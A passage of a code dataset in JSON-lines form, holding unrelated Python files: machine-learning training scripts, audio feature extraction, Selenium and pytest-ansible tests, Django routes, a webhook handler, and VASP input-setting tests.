'val']}\r\n\r\ndataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}\r\nclass_names = image_datasets['train'].classes\r\n\r\nuse_gpu = torch.cuda.is_available()\r\nprint_now(\"Using GPU? \" + str(use_gpu))\r\n\r\n# Get a batch of training data\r\ninputs, classes = next(iter(dataloaders['train']))\r\n\r\n######################################################################\r\n# Training the model\r\n# ------------------\r\n#\r\n# Now, let's write a general function to train a model. 
Here, we will\r\n# illustrate:\r\n#\r\n# - Scheduling the learning rate\r\n# - Saving the best model\r\n#\r\n# In the following, parameter ``scheduler`` is an LR scheduler object from\r\n# ``torch.optim.lr_scheduler``.\r\n\r\n\r\ndef train_model(model, criterion, optimizer, scheduler, num_epochs=25):\r\n since = time.time()\r\n\r\n best_model_wts = copy.deepcopy(model.state_dict())\r\n best_acc = 0.0\r\n\r\n for epoch in range(num_epochs):\r\n print_now('Epoch {}/{}'.format(epoch, num_epochs - 1))\r\n print_now('-' * 10)\r\n\r\n # Each epoch has a training and validation phase\r\n for phase in ['train', 'val']:\r\n if phase == 'train':\r\n scheduler.step()\r\n model.train(True) # Set model to training mode\r\n else:\r\n model.train(False) # Set model to evaluate mode\r\n\r\n running_loss = 0.0\r\n running_corrects = 0\r\n\r\n # Iterate over data.\r\n for data in dataloaders[phase]:\r\n # get the inputs\r\n inputs, labels = data\r\n\r\n # wrap them in Variable\r\n if use_gpu:\r\n inputs = Variable(inputs.cuda())\r\n labels = Variable(labels.cuda())\r\n else:\r\n inputs, labels = Variable(inputs), Variable(labels)\r\n\r\n # zero the parameter gradients\r\n optimizer.zero_grad()\r\n\r\n # forward\r\n outputs = model(inputs)\r\n _, preds = torch.max(outputs.data, 1)\r\n loss = criterion(outputs, labels)\r\n\r\n # backward + optimize only if in training phase\r\n if phase == 'train':\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # statistics\r\n running_loss += loss.item() * float(inputs.size(0))\r\n running_corrects += torch.sum(preds == labels.data).float()\r\n\r\n epoch_loss = running_loss / dataset_sizes[phase]\r\n epoch_acc = running_corrects / dataset_sizes[phase]\r\n\r\n print_now('{} Loss: {:.4f} Acc: {:.4f}'.format(\r\n phase, epoch_loss, epoch_acc))\r\n\r\n # deep copy the model\r\n if phase == 'val' and epoch_acc > best_acc:\r\n best_acc = epoch_acc\r\n best_model_wts = copy.deepcopy(model.state_dict())\r\n\r\n print_now(\"\\n\")\r\n\r\n time_elapsed = time.time() - since\r\n print_now('Training complete in {:.0f}m {:.0f}s'.format(\r\n time_elapsed // 60, time_elapsed % 60))\r\n \r\n print_now(\"Class to index: \" + str(image_datasets['train'].class_to_idx))\r\n print_now('Best val Acc: {:4f}'.format(best_acc))\r\n\r\n # load best model weights\r\n model.load_state_dict(best_model_wts)\r\n return model\r\n\r\n######################################################################\r\n# Finetuning the convnet\r\n# ----------------------\r\n#\r\n# Load a pretrained model and reset final fully connected layer.\r\n#\r\n\r\nmodel_ft = models.resnet18(pretrained=True)\r\nnum_ftrs = model_ft.fc.in_features\r\nmodel_ft.fc = nn.Linear(num_ftrs, 2)\r\n\r\nif use_gpu:\r\n model_ft = model_ft.cuda()\r\n\r\ncriterion = nn.CrossEntropyLoss()\r\n\r\n# Observe that all parameters are being optimized\r\noptimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\r\n\r\n# Decay LR by a factor of 0.1 every 7 epochs\r\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)\r\n\r\nmodel_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,\r\n num_epochs=1)\r\ntorch.save(model_ft, \"./models/model.out\")\r\n\r\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"621464433","text":"import json\nimport essentia\nimport essentia.standard as ess\nfrom essentia.standard import *\nimport matplotlib.pyplot as 
plt\nimport numpy as np\nfrom numpy import savetxt\nimport glob\nimport csv\nimport os\nfrom utils import get_json, save_as_json, save_matrix_array\nfrom utils import save_descriptors_as_matrix \nimport toolz as tz\n\n\ndef extract_mfccs(audio_file):\n loader = essentia.standard.MonoLoader(filename=audio_file)\n print(\"Analyzing:\" + audio_file)\n audio = loader()\n spectrum = Spectrum()\n melBands = MelBands()\n w = Windowing(type='hann')\n fft = FFT()\n\n name = audio_file.split('/')[1].split('.')[-2]\n print(name)\n\n pool = essentia.Pool()\n for frame in ess.FrameGenerator(audio, frameSize=2048, hopSize=2048, startFromZero=True): #for chroma frameSize=8192*2, hopSize=8192, #fz=88200, hs=44100\n mag, phase, = CartesianToPolar()(fft(w(frame)))\n mfcc_bands, mfcc_coeffs = MFCC(numberCoefficients=13)(mag)\n loudness = Loudness()(mag)\n contrast, spectralValley = SpectralContrast()(mag)\n flatness = Flatness()(mag) \n centroid = Centroid()(mag)\n spectral_complex = SpectralComplexity()(mag)\n #mel_bands = melBands(spectrum(w(frame)))\n #dynamic_complexity, loudness = DynamicComplexity()(mag)\n #croma = Chromagram(sampleRate=2048*5)(mag[1:],)\n #onset = OnsetDetection()(mag,phase)\n \n #['flatness', 'mfccVar','complexity','mfccMean','loudness','centroid','spectralContrast'],\n\n pool.add('lowlevel.mfcc', mfcc_coeffs)\n pool.add('lowlevel.loudness', [loudness])\n pool.add('lowlevel.spectralcontrast', contrast)\n pool.add('lowlevel.flatness', [flatness])\n pool.add('lowlevel.spectral_complexity', [spectral_complex])\n pool.add('lowlevel.centroid', [centroid])\n #pool.add('lowlevel.onsets', [onset])\n #pool.add('lowlevel.melbands', mel_bands)\n #pool.add('lowlevel.dyncomplex', [dynamic_complexity])\n #pool.add('lowlevel.chroma', croma)\n #pool.add('lowlevel.dens', dens)\n \n pool.add('audio_file', (name))\n aggrPool = PoolAggregator(defaultStats=['mean','var'])(pool)\n\n YamlOutput(filename='features.json', format='json',\n writeVersion=False)(aggrPool)\n\n json_data = get_json(\"features.json\")\n #dyncomp = json_data['lowlevel']['dynamic_complexity']['mean']\n\n #SCMIR Audio Features\n #[[MFCC],[Chromagram],[SpecPcile, 0.95],[SpecPcile, 0.80],[SpecFlatness]];\n #['flatness', 'mfccVar','complexity','mfccMean','loudness','centroid','spectralContrast'],\n\n\n #os.remove(\"mfccmean.json\")\n return {\"file\": json_data['audio_file'],\n \"flatness\": json_data['lowlevel']['flatness']['mean'],\n \"mfccVar\": json_data['lowlevel']['mfcc']['var'],\n \"complexity\": json_data['lowlevel']['spectral_complexity']['mean'],\n \"mfccMean\": json_data['lowlevel']['mfcc']['mean'],\n \"loudness\": json_data['lowlevel']['loudness']['mean'],\n \"centroid\": json_data['lowlevel']['centroid']['mean'],\n \"spectralContrast\": json_data['lowlevel']['spectralcontrast']['mean'],\n #\"mel\": json_data['lowlevel']['melbands']['mean'],\n # \"chroma\": json_data['lowlevel']['chroma']['mean'],\n #\"onsets\": json_data['lowlevel']['onsets']['mean'],\n #\"dyncomplexity\": json_data['lowlevel']['dyncomplex']['mean'],\n #\"dens\": json_data['lowlevel']['dens']['mean'],\n #\"densVar\": json_data['lowlevel']['dens']['var'],\n }\n\ndef extract_all_mfccs(audio_files):\n print(\"Extracting Features\")\n return list(map(extract_mfccs, audio_files))\n\ndef getProps(props, dict):\n return map(lambda prop: dict[prop], props)\n\ndef concat_features(input_data):\n features = list(map(lambda data: \n list(tz.concat(getProps(\n #['flatness', 'complexity', 'dyncomplexity','mfccMean','onsets'],\n ['flatness', 
'mfccVar','complexity','mfccMean','loudness','centroid','spectralContrast'],\n #['mfccMean','flatness', 'complexity', 'onsets'],\n #['mfccMean', 'mfccVar'],\n #['loudness', 'file'],\n data))),\n input_data))\n #print(features)\n return features\n\ndef save_as_matrix(features):\n save_descriptors_as_matrix('database_names.csv', features)\n\n#test\n\n#input_data = extract_all_mfccs(sorted(glob.glob('Segments/' + \"*.wav\")))\n#print(input_data)\n#save_as_matrix(concat_features(input_data))\n","sub_path":"feature_extract_.py","file_name":"feature_extract_.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"264426610","text":"from time import sleep #导入时间模块响应的时间\n\nfrom selenium.webdriver import ActionChains#导入界面元素类\nfrom selenium.webdriver.common.keys import Keys\n\n\ndef test_input(driver):#纯输入框,输入内容\n driver.get(\"http://ui.yansl.com/#/input\")\n sleep(2)\n\n input =driver.find_element_by_xpath(\"//input[@name='t1']\")\n input.clear()\n input.send_keys(\"我是你大爷��很牛的我\")\n sleep(5)\n\ndef test_radio(driver):#\n driver.get(\"http://ui.yansl.com/#/radio\")\n sleep(1)\n\n radio =driver.find_element_by_xpath(\"//input[@name='sex'][2]\")\n #点击\n radio.click()\n sleep(2)\n\ndef test_checkbox(driver):\n driver.get(\"http://ui.yansl.com/#/checkbox\")\n sleep(2)\n\n checkbox=driver.find_element_by_xpath(\"//label[text()='多选框2']/..//span[1]\")\n attribute = checkbox.get_attribute(\"class\")\n if not attribute=='el-checkbox is-checked':\n checkbox.click()\n sleep(5)\n checkbox = driver.find_element_by_xpath(\"//label[text()='多选框2']/..//span[1]\")\n attribute = checkbox.get_attribute(\"class\")\n if attribute == 'el-checkbox is-checked':\n checkbox.click()\n sleep(5)\ndef test_select(driver): #\n driver.get(\"http://ui.yansl.com/#/select\")\n sleep(2)\n\n select =driver.find_element_by_xpath(\"//label[text()='下拉框2']/../div/div\")\n #点击\n select.click()\n sleep(2)\n option = driver.find_element_by_xpath(\"(//span[text()='双皮奶'])[last()]\")\n actions = ActionChains(driver) #界面元素\n actions.move_to_element(option).perform() #perform去执行\n sleep(2)\n option.click() #点击\n sleep(2) #响应时间\n\ndef test_slider(driver):\n driver.get(\"http://ui.yansl.com/#/slider\") #打开网址\n sleep(2)\n\n slider = driver.find_element_by_xpath(\"//label[text()='竖向选择']/../div/div/div/div/div\")\n sleep(2)\n actions = ActionChains(driver)\n actions.drag_and_drop_by_offset(slider,0,-200).perform()\n sleep(2)\n\ndef test_time(driver):\n driver.get(\"http://ui.yansl.com/#/dateTime\")\n sleep(1)\n\n t1=driver.find_element_by_xpath(\"//label[text()='固定时间']/../div/div/input\")\n t1.clear()\n t1.send_keys(\"14:19:25\")\n sleep(2)\n","sub_path":"demo/test_browser.py","file_name":"test_browser.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"250495314","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sympy import FiniteSet\n\ns = FiniteSet(1, 2, 3, 4, 5, 6)\na = FiniteSet(2, 3, 5)\nb = FiniteSet(1, 3, 5)\ne = a.union(b)\nprint(\"len(e)/len(s)={0}\".format(len(e)/len(s)))\n","sub_path":"chapter5/5_2_1.py","file_name":"5_2_1.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"243922203","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom welcome.views import *\nfrom 
HFactor.views import *\nfrom Polls.views import *\nfrom welcome.forms import *\napp_name = 'welcome'\n\nurlpatterns = [\n url(r'^portfolio_1$', portfolio_1 , name='portfolio_1'),\n url(r'^Paper$', BluePaper , name='Blue_Paper'),\n url(r'^portfolio_2$', portfolio_2 , name='portfolio_2'),\n url(r'^portfolio_3$', portfolio_3 , name='portfolio_3'),\n url(r'^portfolio_4$', portfolio_4 , name='portfolio_4'),\n url(r'^portfolio_item$', portfolio_item , name='portfolio_item'),\n url(r'^blog-home-1$', blog_item_1 , name='blog-home-1'),\n url(r'^blog-home-2$', blog_item_2 , name='blog-home-2'),\n url(r'^blog_item_3$', blog_item_3 , name='blog_item_3'),\n url(r'^full_width$', full_width , name='full_width'),\n url(r'^sidebar$', sidebar , name='sidebar'),\n url(r'^ContactModelFormView$', ContactFormView.as_view(\n template_name=\"welcome/Base/contacta.html\",\n form_class = BasicContactForm,\n ), name=\"contacta\"),\n url(r'^completed$', CompletedPage.as_view(), name=\"completed\"),\n]\n","sub_path":"welcome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"206358589","text":"'''\nlenA, lenB, sum_needed = [int(x) for x in input().split()]\nA = [int(x) for x in input().split()]\nB = [int(x) for x in input().split()]\n\nsums = 0\ncache=[]\n\nwhile sums <= sum_needed:\n cache.append(A.pop(0))\n sums += cache[-1]\n\ncount = len(cache)\nmax_now = count\nscore = 0\nfor i in range(lenB):\n score += B.pop(0)\n count += 1\n while score > sum_needed and count > 0 and len(cache) >0:\n count -= 1\n score -= cache.pop()\n if score <= sum_needed and count > max_now:\n max_now = count\nprint(max_now)\n'''\nimport bisect\nfrom itertools import accumulate\nfor _ in range(int(input())):\n lA, lB, X = [int(x) for x in input().split()]\n A = [int(x) for x in input().split()]\n B = [int(x) for x in input().split()]\n AC = [0] + list(accumulate(A))\n BC = [0] + list(accumulate(B))\n\n ans = 0\n for i, x in enumerate(AC):\n if x > X:break\n j = bisect.bisect(BC, X-x)\n if j >= 0:\n ans = max(ans, i+j-1)\n print(ans)\n\n'''\nfrom sys import stdin\nrr = lambda: stdin.readline().strip()\nrrm = lambda: map(int, rr().split())\n\nimport bisect\ndef solve(X, A, B):\n Pa, Pb = [0], [0]\n for x in A:\n Pa.append(Pa[-1] + x)\n for x in B:\n Pb.append(Pb[-1] + x)\n print(Pa, Pb)\n ans = 0\n #Pa[i] + Pb[j] <= X means a score of i+j\n for i, x in enumerate(Pa):\n if x > X: break\n j = bisect.bisect(Pb, X-x)\n if j >= 0:\n ans = max(ans, i + j - 1)\n return ans\n\nfor _ in xrange(int(rr())):\n print solve(rrm()[2], rrm(), rrm())\n'''\n\n\n\n\n\n\n","sub_path":"Hackerrank/game_of_two_stacks_1.py","file_name":"game_of_two_stacks_1.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"336087682","text":"import sys\nimport pytest\nimport ansible\nimport mock\nfrom _pytest.main import EXIT_OK, EXIT_TESTSFAILED, EXIT_USAGEERROR, EXIT_NOTESTSCOLLECTED, EXIT_INTERRUPTED\n\nif sys.version_info[0] == 2:\n import __builtin__ as builtins # NOQA\nelse:\n import builtins # NOQA\n\n\ndef test_plugin_help(testdir):\n \"\"\"Verifies expected output from of py.test --help\"\"\"\n\n result = testdir.runpytest('--help')\n result.stdout.fnmatch_lines([\n # Check for the github args section header\n 'pytest-ansible:',\n # Check for the specific args\n ' --ansible-inventory=ANSIBLE_INVENTORY',\n ' 
--ansible-host-pattern=ANSIBLE_HOST_PATTERN',\n ' --ansible-connection=ANSIBLE_CONNECTION',\n ' --ansible-user=ANSIBLE_USER',\n ' --ansible-debug *',\n ' --ansible-sudo *',\n ' --ansible-sudo-user=ANSIBLE_SUDO_USER',\n ' --ansible-become *',\n ' --ansible-become-method=ANSIBLE_BECOME_METHOD',\n ' --ansible-become-user=ANSIBLE_BECOME_USER',\n # Check for the marker in --help\n ' ansible (args) * Ansible integration',\n ])\n\n\ndef test_plugin_markers(testdir):\n \"\"\"Verifies expected output from of py.test --markers\"\"\"\n\n result = testdir.runpytest('--markers')\n result.stdout.fnmatch_lines([\n '@pytest.mark.ansible(*args): Ansible integration',\n ])\n\n\ndef test_report_header(testdir, option):\n \"\"\"Verify the expected ansible version in the pytest report header.\n \"\"\"\n\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_NOTESTSCOLLECTED\n result.stdout.fnmatch_lines([\n 'ansible: %s' % ansible.__version__,\n ])\n\n\ndef test_params_not_required_when_not_using_fixture(testdir, option):\n \"\"\"Verify the ansible parameters are not required if the fixture is not used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func():\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_OK\n\n\ndef test_params_required_when_using_fixture(testdir, option):\n \"\"\"Verify the ansible parameters are required if the fixture is used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_USAGEERROR\n result.stderr.fnmatch_lines([\n 'ERROR: Missing required parameter --ansible-host-pattern',\n ])\n\n\ndef test_params_required_with_host_generator(testdir, option):\n \"\"\"Verify the ansible parameters are required if the fixture is used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func(ansible_host):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_TESTSFAILED\n result.stdout.fnmatch_lines([\n 'collected 0 items / 1 errors',\n 'E UsageError: Missing required parameter --ansible-host-pattern',\n ])\n\n\ndef test_params_required_with_group_generator(testdir, option):\n \"\"\"Verify the ansible parameters are required if the fixture is used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func(ansible_group):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_TESTSFAILED\n result.stdout.fnmatch_lines([\n 'collected 0 items / 1 errors',\n 'E UsageError: Missing required parameter --ansible-host-pattern',\n ])\n\n\n@pytest.mark.parametrize(\n \"required_value_parameter\",\n [\n '--ansible-inventory',\n '--ansible-host-pattern',\n '--ansible-connection',\n '--ansible-user',\n '--ansible-sudo-user',\n '--ansible-become-method',\n '--ansible-become-user',\n ],\n)\ndef test_param_requires_value(testdir, required_value_parameter):\n \"\"\"Verifies failure when not providing a value to a parameter that requires a value\"\"\"\n\n result = testdir.runpytest(*[required_value_parameter])\n assert result.ret == EXIT_INTERRUPTED\n result.stderr.fnmatch_lines([\n '*: error: argument %s: expected one argument' % required_value_parameter,\n ])\n\n\ndef test_params_required_with_inventory_without_host_pattern(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n 
result = testdir.runpytest(*option.args + ['--ansible-inventory', 'local,'])\n assert result.ret == EXIT_USAGEERROR\n result.stderr.fnmatch_lines([\n 'ERROR: Missing required parameter --ansible-host-pattern',\n ])\n\n\n@pytest.mark.requires_ansible_v1\ndef test_params_required_with_bogus_inventory_v1(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n with mock.patch('os.path.exists', return_value=False) as mock_exists:\n result = testdir.runpytest(*['--ansible-inventory', 'bogus', '--ansible-host-pattern', 'all'])\n\n # Assert py.test exit code\n assert result.ret == EXIT_TESTSFAILED\n\n # Assert expected error output\n result.stdout.fnmatch_lines([\n '*UsageError: Unable to find an inventory file, specify one with -i ?',\n ])\n\n # Assert mock open called on provided file\n mock_exists.assert_any_call('bogus')\n\n\n@pytest.mark.requires_ansible_v2\ndef test_params_required_with_bogus_inventory_v2(testdir, option, recwarn):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n ansible_module.ping()\n \"\"\"\n testdir.makepyfile(src)\n\n with mock.patch('ansible.parsing.dataloader.DataLoader.path_exists', return_value=False) as mock_exists:\n # with mock.patch('ansible.parsing.dataloader.DataLoader.is_file', return_value=False) as mock_isfile:\n result = testdir.runpytest(*['-vvvvvs', '--ansible-inventory', 'bogus', '--ansible-host-pattern', 'all'])\n\n # Assert py.test exit code\n # assert result.ret == EXIT_OK\n assert result.ret == EXIT_TESTSFAILED\n\n # TODO - assert the following warning appears\n # [WARNING]: provided hosts list is empty, only localhost is available\"\n if False:\n result.stderr.fnmatch_lines(\n [\n \"*provided hosts list is empty, only localhost is available\",\n ]\n )\n\n # Assert mock open called on provided file\n mock_exists.assert_any_call('bogus')\n\n\n@pytest.mark.requires_ansible_v1\ndef test_params_required_without_inventory_with_host_pattern_v1(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args + ['--ansible-host-pattern', 'all'])\n assert result.ret == EXIT_TESTSFAILED\n result.stdout.fnmatch_lines([\n 'UsageError: Unable to find an inventory file, specify one with -i ?',\n ])\n\n\n@pytest.mark.requires_ansible_v2\ndef test_params_required_without_inventory_with_host_pattern_v2(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args + ['--ansible-host-pattern', 'all'])\n assert result.ret == EXIT_OK\n\n # TODO - validate the following warning message\n # [WARNING]: provided hosts list is empty, only localhost is available\n if False:\n result.stderr.fnmatch_lines(\n [\n \"*provided hosts list is empty, only localhost is available\",\n ]\n )\n\n\ndef test_param_override_with_marker(testdir):\n src = \"\"\"\n import pytest\n @pytest.mark.ansible(inventory='local,', connection='local', host_pattern='all')\n def test_func(ansible_module):\n ansible_module.ping()\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*['-vvvvvs', '--tb', 'native', '--ansible-inventory', 'garbage,', '--ansible-host-pattern',\n 'garbage', '--ansible-connection', 'garbage'])\n assert result.ret == EXIT_OK\n\n # Mock assert the correct variables are 
set\n","sub_path":"tests/test_params.py","file_name":"test_params.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"289490450","text":"import asyncio\nimport logging\n\nfrom aiohttp.web_response import Response\n\nlogger = logging.getLogger(__name__)\n\n\nasync def incoming_request(request):\n airtable = request.app.plugins[\"airtable\"]\n payload = await request.json()\n logger.debug(\"Incoming Airtable event payload: %s\", payload)\n\n if payload[\"token\"] != airtable.verify:\n return Response(status=401)\n\n futures = list(_dispatch(airtable.routers[\"request\"], payload, request.app))\n if futures:\n return await _wait_and_check_result(futures)\n return Response(status=200)\n\n\ndef _dispatch(router, event, app):\n for handler, configuration in router.dispatch(event):\n f = asyncio.ensure_future(handler(event, app))\n if configuration[\"wait\"]:\n yield f\n else:\n f.add_done_callback(_callback)\n\n\ndef _callback(f):\n try:\n f.result()\n except Exception as e:\n logger.exception(e)\n\n\nasync def _wait_and_check_result(futures):\n dones, _ = await asyncio.wait(futures, return_when=asyncio.ALL_COMPLETED)\n try:\n results = [done.result() for done in dones]\n except Exception as e:\n logger.exception(e)\n return Response(status=500)\n\n results = [result for result in results if isinstance(result, Response)]\n if len(results) > 1:\n logger.warning(\"Multiple web.Response for handler, returning none\")\n elif results:\n return results[0]\n\n return Response(status=200)\n","sub_path":"pybot/plugins/airtable/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"580970371","text":"import json\n\ndef error_msg(error_number):\n error_dict = {\n 1: \"Error : Area of property should be an integer\",\n 2: \"Error: Type of property should be an House/Apartment/Others\",\n 3: \"Error: Number of Rooms of property should be an integer\",\n 4: \"Error: Zip code of property should be an integer\",\n }\n\n error = error_dict.get(error_number)\n\n return print(error)\n\n\ndef preprocess(json_data_for_property):\n x = json_data_for_property\n\n # parse x:\n y = json.loads(x) \n\n # the result is a Python dictionary:\n\n #checking for valid inputs and giving errors in case inputs are invalid\n if type(y[\"data\"][\"area\"])is not int : \n return error_msg(1)\n if y[\"data\"][\"property-type\"].upper() not in [\"APARTMENT\",\"HOUSE\",\"OTHERS\"] : \n return error_msg(2)\n if type(y[\"data\"][\"rooms-number\"]) is not int:\n return error_msg(3)\n if type(y[\"data\"][\"zip-code\"]) is not int:\n return error_msg(4) \n \n return y\n\nhome = '{\t\"data\": { \"area\": 56 , \"property-type\": \"APATMENT\" , \"rooms-number\": 2, \"zip-code\":48326} }'\nprint(preprocess(home))\n\npreprocess()\n'''{\n \"data\": {\n \"area\": int,\n \"property-type\": \"APARTMENT\" | \"HOUSE\" | \"OTHERS\",\n \"rooms-number\": int,\n \"zip-code\": int,\n \"land-area\": Optional[int],\n \"garden\": Optional[bool],\n \"garden-area\": Optional[int],\n \"equipped-kitchen\": Optional[bool],\n \"full-address\": Optional[str],\n \"swimming-pool\": Optional[bool],\n \"furnished\": Optional[bool],\n \"open-fire\": Optional[bool],\n \"terrace\": Optional[bool],\n \"terrace-area\": Optional[int],\n \"facades-number\": Optional[int],\n \"building-state\": Optional[\n \"NEW\" | \"GOOD\" | \"TO RENOVATE\" | \"JUST 
RENOVATED\" | \"TO REBUILD\"\n ]\n }\n}'''\n\n","sub_path":"preprocessing/cleaning_data.py","file_name":"cleaning_data.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"188187806","text":"import keras\r\nfrom keras.layers.core import *\r\nfrom keras.layers.convolutional import *\r\nfrom keras.models import Sequential, load_model\r\nfrom random import randint\r\nfrom keras.utils import plot_model\r\n\r\ntest_name = 'cnn2'\r\ncount = 6000\r\nepoch = 5\r\nrand = randint(0, 60000-count)\r\ncount = rand + count\r\n\r\nmnist = keras.datasets.mnist\r\n\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\nx_train, x_test = x_train / 255.0, x_test / 255.0\r\n\r\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\r\nx_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\r\n\r\ntry:\r\n model = load_model('%s.hdf5' % test_name)\r\nexcept Exception as e:\r\n model = Sequential()\r\n model.add(Conv2D(6, kernel_size=(3, 3), strides=(1, 1),\r\n activation='relu',\r\n input_shape=(28, 28, 1),\r\n name='C1'))\r\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='S1'))\r\n model.add(Conv2D(6, (3, 3), activation='relu', name='C2'))\r\n model.add(MaxPooling2D(pool_size=(2, 2), name='S2'))\r\n model.add(Conv2D(6, (3, 3), activation='relu', name='C3'))\r\n model.add(MaxPooling2D(pool_size=(2, 2), name='S3'))\r\n model.add(Flatten())\r\n model.add(Dense(120, activation='relu'))\r\n model.add(Dense(84, activation='relu'))\r\n model.add(Dense(10, activation='softmax'))\r\n\r\n model.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n\r\nmodel.fit(x_train[rand:count], y_train[rand:count], epochs=epoch)\r\n\r\nmodel.save('%s.hdf5' % test_name)\r\n\r\nprint(model.evaluate(x_test, y_test))\r\nprint(model.metrics_names)\r\n","sub_path":"cnn2.py","file_name":"cnn2.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"564802819","text":"# -*- coding: utf-8 -*-\nfrom copy import deepcopy\n\nfrom pymatgen import Composition\nfrom pymatgen.io.vasp import Potcar\n\nfrom vise.input_set.settings_incar import (\n TaskIncarSettings, XcIncarSettings, CommonIncarSettings)\nfrom vise.input_set.task import Task\nfrom vise.input_set.xc import Xc\nfrom vise.util.testing import ViseTest\n\n__author__ = \"Yu Kumagai\"\n__maintainer__ = \"Yu Kumagai\"\n\n\nclass TaskIncarSettingsTest(ViseTest):\n def setUp(self) -> None:\n mgo = self.get_structure_by_name(\"MgO\")\n self.default_kwargs = {\"task\": Task.structure_opt,\n \"structure\": mgo,\n \"potcar\": Potcar([\"Mg\", \"O\"]),\n \"num_kpoints\": 8,\n \"max_enmax\": 400.0,\n \"is_magnetization\": False,\n \"vbm_cbm\": [3.0, 8.0],\n \"npar_kpar\": True,\n \"num_nodes\": 1,\n \"encut\": None,\n \"structure_opt_encut_factor\": 1.3,\n \"dos_step_size\": 0.01}\n\n def test_structure_opt(self):\n setting = TaskIncarSettings.from_options(**self.default_kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 3,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-07,\n 'NSW': 50,\n 'EDIFFG': -0.005,\n 'KPAR': 4,\n 'ENCUT': 520.0}\n self.assertEqual(expected, setting.settings)\n\n def test_structure_opt_rough(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.structure_opt_rough\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 3,\n 'ISMEAR': 
0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-04,\n 'NSW': 50,\n 'EDIFFG': -0.2,\n 'KPAR': 4,\n 'POTIM': 0.1,\n 'ENCUT': 520.0}\n self.assertEqual(expected, setting.settings)\n\n def test_structure_opt_tight(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.structure_opt_tight\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'ADDGRID': True,\n 'IBRION': 2,\n 'PREC': 'A',\n 'ISIF': 3,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-08,\n 'NSW': 50,\n 'EDIFFG': -0.001,\n 'KPAR': 4,\n 'ENCUT': 520.0}\n self.assertEqual(expected, setting.settings)\n\n def test_cluster_opt(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.cluster_opt\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 2,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-07,\n 'NSW': 50,\n 'EDIFFG': -0.005,\n 'KPAR': 4,\n 